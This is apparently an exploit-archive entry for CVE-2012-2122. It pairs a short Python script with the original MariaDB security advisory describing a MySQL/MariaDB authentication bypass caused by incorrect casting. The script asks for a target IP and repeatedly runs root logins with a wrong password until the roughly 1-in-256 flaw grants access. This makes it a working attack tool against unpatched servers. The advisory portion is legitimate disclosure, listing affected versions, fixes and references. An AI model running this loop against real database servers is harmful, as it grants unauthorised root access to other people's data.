MySQL Remote Root Authentication Bypass

`#!/usr/bin/python  
#  
#  
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.  
#  
# Title: MySQL Remote Root Authentication Bypass  
# Written by: Dave Kennedy (ReL1K)  
# http://www.secmaniac.com  
#  
# Original advisory here: seclists.org/oss-sec/2012/q2/493  
import subprocess  
  
ipaddr = raw_input("Enter the IP address of the mysql server: ")  
  
while 1:  
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()  
  
  
  
=======  
Original post:  
  
From: Sergei Golubchik <serg () montyprogram com>  
Date: Sat, 9 Jun 2012 17:30:38 +0200  
  
Hi  
  
We have recently found a serious security bug in MariaDB and MySQL.  
So, here, we'd like to let you know about what the issue and its impact  
is. At the end you can find a patch, in case you need to patch an older  
unsuported MySQL version.  
  
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are  
vulnerable.  
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.  
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.  
  
This issue got assigned an id CVE-2012-2122.  
  
Here's the issue. When a user connects to MariaDB/MySQL, a token (SHA  
over a password and a random scramble string) is calculated and compared  
with the expected value. Because of incorrect casting, it might've  
happened that the token and the expected value were considered equal,  
even if the memcmp() returned a non-zero value. In this case  
MySQL/MariaDB would think that the password is correct, even while it is  
not. Because the protocol uses random strings, the probability of  
hitting this bug is about 1/256.  
  
Which means, if one knows a user name to connect (and "root" almost  
always exists), she can connect using *any* password by repeating  
connection attempts. ~300 attempts takes only a fraction of second, so  
basically account password protection is as good as nonexistent.   
Any client will do, there's no need for a special libmysqlclient library.  
  
But practically it's better than it looks - many MySQL/MariaDB builds  
are not affected by this bug.  
  
Whether a particular build of MySQL or MariaDB is vulnerable, depends on  
how and where it was built. A prerequisite is a memcmp() that can return  
an arbitrary integer (outside of -128..127 range). To my knowledge gcc  
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc  
sse-optimized memcmp is not safe, but gcc usually uses the inlined  
builtin version.  
  
As far as I know, official vendor MySQL and MariaDB binaries are not  
vulnerable.  
  
Regards,  
Sergei Golubchik  
MariaDB Security Coordinator  
  
References:  
  
MariaDB bug report: https://mariadb.atlassian.net/browse/MDEV-212  
MariaDB fix: http://bazaar.launchpad.net/~maria-captains/maria/5.1/revision/3144  
  
MySQL bug report: http://bugs.mysql.com/bug.php?id=64884  
MySQL fix: http://bazaar.launchpad.net/~mysql/mysql-server/5.1/revision/3560.10.17  
MySQL changelog:  
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html  
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html  
  
  
`